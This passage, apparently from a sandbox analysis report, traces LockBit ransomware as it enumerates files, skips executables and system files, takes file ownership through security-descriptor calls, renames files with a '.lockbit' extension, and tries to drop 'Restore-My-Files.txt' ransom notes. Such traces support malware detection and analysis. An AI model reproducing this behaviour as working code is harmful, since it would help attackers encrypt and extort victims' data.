(lpString1=".adv", lpString2=".xml") returned -1 [0080.265] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0080.265] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0080.265] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0080.265] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0080.265] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0080.265] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0080.265] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0080.265] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0080.265] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0080.266] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0080.266] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0080.266] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0080.266] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0080.266] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0080.266] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0080.266] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0080.266] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0080.266] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0080.266] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0080.266] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0080.266] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0080.266] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0080.266] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0080.266] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0080.266] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0080.266] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0080.266] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0080.266] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0080.266] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0080.266] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0080.266] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0080.266] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0080.266] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0080.267] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0080.267] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0080.267] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0080.267] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0080.267] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0080.267] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0080.267] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0080.267] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0080.267] wsprintfW (in: param_1=0x344c6e0, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0080.267] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="keypadbase.xml") returned 1 [0080.267] lstrcmpiW (lpString1="ntldr", lpString2="keypadbase.xml") returned 1 [0080.267] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="keypadbase.xml") returned 1 [0080.267] lstrcmpiW (lpString1="bootsect.bak", lpString2="keypadbase.xml") returned -1 [0080.267] lstrcmpiW (lpString1="autorun.inf", lpString2="keypadbase.xml") returned -1 [0080.267] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\") returned="" [0080.267] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned=".xml" [0080.267] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0080.267] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0080.267] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0080.267] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0080.267] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0080.267] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0080.267] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0080.268] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0080.268] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0080.268] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0080.268] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0080.268] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0080.268] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0080.268] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0080.268] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0080.268] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0080.268] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0080.268] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0080.268] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0080.268] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0080.268] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0080.268] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0080.268] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0080.268] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0080.268] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0080.268] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0080.268] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0080.268] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0080.268] wsprintfW (in: param_1=0x344be80, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.lockbit") returned 95 [0080.269] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0080.269] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.lockbit")) returned 0 [0080.434] GetLastError () returned 0x5 [0080.435] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0080.435] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0080.435] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.435] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0080.435] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0080.436] NtOpenFile (in: FileHandle=0x344be28, DesiredAccess=0x80, ObjectAttributes=0x344bcd8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344bcd0, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344be28*=0x3c4, IoStatusBlock=0x344bcd0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0080.436] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0080.436] NtQueryInformationFile (in: FileHandle=0x3c4, IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0) returned 0x0 [0080.591] NtClose (Handle=0x3c4) returned 0x0 [0080.592] RtlFreeAnsiString (AnsiString="\\") [0080.592] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344be64 | out: TokenHandle=0x344be64*=0x3c4) returned 1 [0080.592] malloc (_Size=0x200) returned 0x53fcc0 [0080.592] GetTokenInformation (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344be60 | out: TokenInformation=0x53fcc0, ReturnLength=0x344be60) returned 1 [0080.592] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344be48, dwRevision=0x1 | out: pSecurityDescriptor=0x344be48) returned 1 [0080.592] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344be48, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344be48) returned 1 [0080.592] CloseHandle (hObject=0x3c4) returned 1 [0080.592] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344be48) returned 1 [0080.592] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344be48) returned 1 [0080.593] free (_Block=0x53fcc0) [0080.593] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0080.593] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.lockbit")) returned 1 [0080.594] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0080.594] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0080.594] malloc (_Size=0x40068) returned 0x206b860 [0080.595] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=1118) returned 1 [0080.595] ReadFile (in: hFile=0x3c4, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 0x0 [0080.605] GetLastError () returned 0x3e5 [0080.605] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad") returned 1 [0080.605] wsprintfW (in: param_1=0x344bc38, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\Restore-My-Files.txt") returned 93 [0080.605] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.605] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cb5dcd, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1cb5dcd, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f4ecf1b, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x188, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="kor-kor.xml", cAlternateFileName="")) returned 1 [0080.605] lstrcmpiW (lpString1=".", lpString2="kor-kor.xml") returned -1 [0080.605] lstrcmpiW (lpString1="..", lpString2="kor-kor.xml") returned -1 [0080.605] PathFindExtensionW (pszPath="kor-kor.xml") returned=".xml" [0080.605] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0080.605] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0080.605] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0080.606] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0080.606] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0080.606] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0080.606] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0080.606] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0080.606] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0080.606] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0080.606] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0080.606] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0080.606] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0080.606] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0080.606] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0080.606] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0080.606] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0080.606] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0080.606] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0080.606] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0080.607] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0080.607] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0080.607] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0080.607] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0080.607] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0080.607] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0080.607] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0080.607] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0080.607] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0080.607] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0080.607] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0080.607] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0080.607] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0080.607] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0080.607] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0080.607] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0080.608] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0080.608] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0080.608] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0080.608] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0080.608] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0080.608] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0080.608] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0080.608] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0080.608] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0080.608] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0080.608] wsprintfW (in: param_1=0x344c6e0, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0080.608] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="kor-kor.xml") returned 1 [0080.608] lstrcmpiW (lpString1="ntldr", lpString2="kor-kor.xml") returned 1 [0080.608] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="kor-kor.xml") returned 1 [0080.608] lstrcmpiW (lpString1="bootsect.bak", lpString2="kor-kor.xml") returned -1 [0080.608] lstrcmpiW (lpString1="autorun.inf", lpString2="kor-kor.xml") returned -1 [0080.609] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\") returned="" [0080.609] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned=".xml" [0080.609] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0080.609] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0080.609] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0080.609] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0080.609] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0080.609] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0080.609] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0080.609] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0080.609] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0080.609] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0080.609] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0080.609] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0080.609] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0080.609] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0080.610] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0080.610] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0080.610] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0080.610] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0080.610] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0080.610] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0080.610] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0080.610] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0080.610] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0080.610] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0080.610] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0080.610] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0080.610] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0080.610] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0080.610] wsprintfW (in: param_1=0x344be80, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.lockbit") returned 92 [0080.610] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0080.611] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.lockbit")) returned 0 [0080.611] GetLastError () returned 0x5 [0080.611] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0080.612] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0080.612] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.612] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0080.613] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0080.613] NtOpenFile (in: FileHandle=0x344be28, DesiredAccess=0x80, ObjectAttributes=0x344bcd8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344bcd0, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344be28*=0x3b0, IoStatusBlock=0x344bcd0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0080.614] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0080.614] NtQueryInformationFile (in: FileHandle=0x3b0, IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0) returned 0x0 [0080.631] NtClose (Handle=0x3b0) returned 0x0 [0080.631] RtlFreeAnsiString (AnsiString="\\") [0080.631] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344be64 | out: TokenHandle=0x344be64*=0x3b0) returned 1 [0080.632] malloc (_Size=0x200) returned 0x53fcc0 [0080.632] GetTokenInformation (in: TokenHandle=0x3b0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344be60 | out: TokenInformation=0x53fcc0, ReturnLength=0x344be60) returned 1 [0080.632] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344be48, dwRevision=0x1 | out: pSecurityDescriptor=0x344be48) returned 1 [0080.632] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344be48, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344be48) returned 1 [0080.632] CloseHandle (hObject=0x3b0) returned 1 [0080.632] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344be48) returned 1 [0080.633] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344be48) returned 1 [0080.635] free (_Block=0x53fcc0) [0080.635] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0080.635] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.lockbit")) returned 1 [0080.636] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b0 [0080.637] CreateIoCompletionPort (FileHandle=0x3b0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0080.637] malloc (_Size=0x40068) returned 0x3940048 [0080.637] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x3940060 | out: lpFileSize=0x3940060*=392) returned 1 [0080.637] ReadFile (in: hFile=0x3b0, lpBuffer=0x394007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 1 [0080.639] GetLastError () returned 0x3e5 [0080.639] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad") returned 1 [0080.639] wsprintfW (in: param_1=0x344bc38, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\Restore-My-Files.txt") returned 93 [0080.639] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.639] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cb5dcd, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1cb5dcd, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f4ecf1b, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x188, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="kor-kor.xml", cAlternateFileName="")) returned 0 [0080.639] GetLastError () returned 0x12 [0080.639] FindClose (in: hFindFile=0x2e32d0 | out: hFindFile=0x2e32d0) returned 1 [0080.640] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f47ab01, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f47ab01, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f47ab01, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2d7, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="keypad.xml", cAlternateFileName="")) returned 1 [0080.640] lstrcmpiW (lpString1=".", lpString2="keypad.xml") returned -1 [0080.640] lstrcmpiW (lpString1="..", lpString2="keypad.xml") returned -1 [0080.640] PathFindExtensionW (pszPath="keypad.xml") returned=".xml" [0080.640] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0080.640] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0080.640] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0080.640] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0080.640] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0080.640] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0080.640] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0080.640] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0080.640] lstrcmpiW (lpString1=".com", 